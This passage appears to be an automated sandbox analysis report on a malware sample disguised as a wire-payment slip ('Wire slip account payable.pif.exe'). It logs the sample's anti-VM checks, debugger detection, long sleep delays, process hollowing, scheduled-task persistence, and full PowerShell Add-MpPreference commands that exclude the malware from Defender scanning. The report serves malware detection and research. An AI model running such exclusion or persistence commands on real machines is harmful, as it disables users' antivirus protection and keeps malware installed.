                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -598875s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -598765s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -598656s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -598546s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -598437s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -598328s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -598218s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -598109s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -598000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -597890s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -597781s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -597671s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -597562s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -597453s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -597344s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -597220s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -597109s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -597000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -596890s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -596781s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -596672s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -596547s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -596437s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -596328s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -596189s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -596078s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -595968s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -595847s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -595734s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -595625s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -595515s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -595406s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -595297s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -595176s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -595047s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -594937s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -594828s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -594718s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -594609s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -594500s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exe TID: 7996Thread sleep time: -594390s >= -30000s
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 599875Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 599765Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 599656Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 599547Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 599437Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 599328Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 599219Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 599104Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 598981Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 598875Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 598765Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 598656Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 598545Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 598426Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 598297Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 598172Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 598062Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 597953Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 597844Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 597719Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 597609Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 597500Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 597391Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 597281Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 597172Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 597062Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 596951Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 596844Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 596734Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 596625Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 596515Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 596406Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 596297Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 596187Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 596078Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 595968Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 595859Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 595750Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 595641Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 595531Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 595422Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 595312Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 595203Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 595094Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 594963Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 594844Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 594734Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 594625Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeThread delayed: delay time: 594516Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 599890
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 599781
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 599534
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 599421
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 599312
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 599203
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 599094
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 598982
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 598875
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 598765
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 598656
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 598546
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 598437
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 598328
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 598218
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 598109
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 598000
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 597890
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 597781
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 597671
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 597562
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 597453
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 597344
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 597220
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 597109
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 597000
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 596890
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 596781
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 596672
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 596547
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 596437
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 596328
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 596189
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 596078
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 595968
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 595847
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 595734
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 595625
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 595515
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 595406
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 595297
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 595176
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 595047
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 594937
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 594828
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 594718
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 594609
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 594500
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeThread delayed: delay time: 594390
                      Source: EQVRGq.exe, 0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                      Source: EQVRGq.exe, 0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1746285908.00000000077C0000.00000004.08000000.00040000.00000000.sdmp, Wire slip account payable.pif.exe, 00000000.00000002.1740228748.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: H8vhGFSYAQ
                      Source: EQVRGq.exe, 0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                      Source: Wire slip account payable.pif.exe, 00000008.00000002.4157630199.0000000000EFF000.00000004.00000020.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4158328138.000000000149C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 8_2_011B7050 CheckRemoteDebuggerPresent,8_2_011B7050
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess queried: DebugPort
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Wire slip account payable.pif.exe"
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EQVRGq.exe"
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Wire slip account payable.pif.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EQVRGq.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeMemory written: C:\Users\user\Desktop\Wire slip account payable.pif.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeMemory written: C:\Users\user\AppData\Roaming\EQVRGq.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Wire slip account payable.pif.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EQVRGq.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp14C9.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess created: C:\Users\user\Desktop\Wire slip account payable.pif.exe "C:\Users\user\Desktop\Wire slip account payable.pif.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp25B1.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess created: C:\Users\user\AppData\Roaming\EQVRGq.exe "C:\Users\user\AppData\Roaming\EQVRGq.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess created: C:\Users\user\AppData\Roaming\EQVRGq.exe "C:\Users\user\AppData\Roaming\EQVRGq.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Users\user\Desktop\Wire slip account payable.pif.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
